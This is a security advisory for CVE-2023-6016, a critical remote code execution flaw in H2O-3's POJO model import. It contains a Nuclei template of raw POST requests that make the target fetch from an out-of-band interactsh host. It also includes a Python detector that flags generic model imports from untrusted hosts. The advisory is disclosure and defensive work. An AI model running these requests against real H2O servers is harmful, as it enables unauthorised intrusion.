Critical

h2o-3

Remote Code Execution via Source POJO Model Import

A vulnerability in H2O-3 version 3.42.0.2 allows attackers to execute arbitrary code by uploading a malicious source POJO model. The issue was identified in the process of importing models through the web UI and leads to a full compromise of the system running H2O-3. The advisory does not name a patched version, so users should consult the H2O-3 repository for updates.

Available publicly on Nov 16 2023

CVSS: 10

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Nuclei Template

```yaml
id: h2o-pojo-import-rce

info:
  name: H2O RCE via POJO Model import
  author: Sierra Bearchell (Vuln Discovery), byt3bl33d3r (Nuclei Template)
  severity: critical
  description: RCE in H2O dashboard by (ab)using it's POJO Model import feature
  reference:
    - https://huntr.com/bounties/83dd17ec-053e-453c-befb-7d6736bf1836/
  classification:
    cvss-score: 10
    cve-id: CVE-2023-6016
    cwe-id: CWE-78
  tags: h2o-3,h2o,cve,ml,protectai,huntr

http:
  - raw:
      - |
        POST /3/ModelBuilders/generic/parameters HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        model_id=generic-68510df2-f19a-4871-8285-9321a7ef6d51

      - |
        POST /3/ModelBuilders/generic/parameters HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        model_id=generic-68510df2-f19a-4871-8285-9321a7ef6d51&path=http%3A%2F%2F93{{interactsh-url}}

      - |
        POST /3/ModelBuilders/generic/parameters HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        model_id=generic-68510df2-f19a-4871-8285-9321a7ef6d51&path=http%3A%2F%2F93{{interactsh-url}}

      - |
        POST /3/ModelBuilders/generic HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        model_id=generic-68510df2-f19a-4871-8285-9321a7ef6d51&path=http%3A%2F%2F93{{interactsh-url}}

    matchers:
      - type: word
        part: interactsh_protocol # Confirms http Interaction
        words:
          - "http"
```
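
A defensive counterpart to the template above, as an added example that is not part of the original advisory or the H2O-3 project: it checks logged HTTP requests for generic model imports whose `path` parameter points at an http(s) host outside an allowlist. The request tuples, `TRUSTED_MODEL_HOSTS` and every host name are constructed assumptions; the two endpoint paths are the ones the template posts to.

```python
from urllib.parse import parse_qs, urlsplit

# Endpoints used by the template on this page.
GENERIC_IMPORT_PATHS = {
    "/3/ModelBuilders/generic",
    "/3/ModelBuilders/generic/parameters",
}

# Assumption: hosts your own pipelines legitimately import models from.
TRUSTED_MODEL_HOSTS = {"models.internal.example"}


def classify_request(method, uri, body):
    """Return a reason string for a suspicious generic import, else None."""
    if method.upper() != "POST":
        return None
    if urlsplit(uri).path.rstrip("/") not in GENERIC_IMPORT_PATHS:
        return None
    # parse_qs percent-decodes the form body, so path=http%3A%2F%2F... is
    # compared in its decoded form.
    params = parse_qs(body, keep_blank_values=True)
    for value in params.get("path", []):
        target = urlsplit(value.strip())
        if target.scheme.lower() not in ("http", "https"):
            continue  # local paths and other schemes are out of scope here
        host = (target.hostname or "").lower()
        if host not in TRUSTED_MODEL_HOSTS:
            return f"generic model import from untrusted host {host!r}"
    return None


def find_untrusted_imports(requests):
    """Return (index, reason) for every flagged (method, uri, body) record."""
    findings = []
    for index, (method, uri, body) in enumerate(requests):
        reason = classify_request(method, uri, body)
        if reason:
            findings.append((index, reason))
    return findings


# Constructed sample records, e.g. from a reverse proxy that logs bodies.
SAMPLE_REQUESTS = [
    ("POST", "/3/ModelBuilders/generic/parameters", "model_id=generic-demo"),
    ("POST", "/3/ModelBuilders/generic",
     "model_id=generic-demo&path=http%3A%2F%2Funtrusted.example%2Fmodel.java"),
    ("POST", "/3/ModelBuilders/generic",
     "model_id=generic-demo&path=https%3A%2F%2Fmodels.internal.example%2Fgbm.zip"),
    ("POST", "/3/ModelBuilders/gbm", "training_frame=iris"),
    ("GET", "/3/Models", ""),
]
```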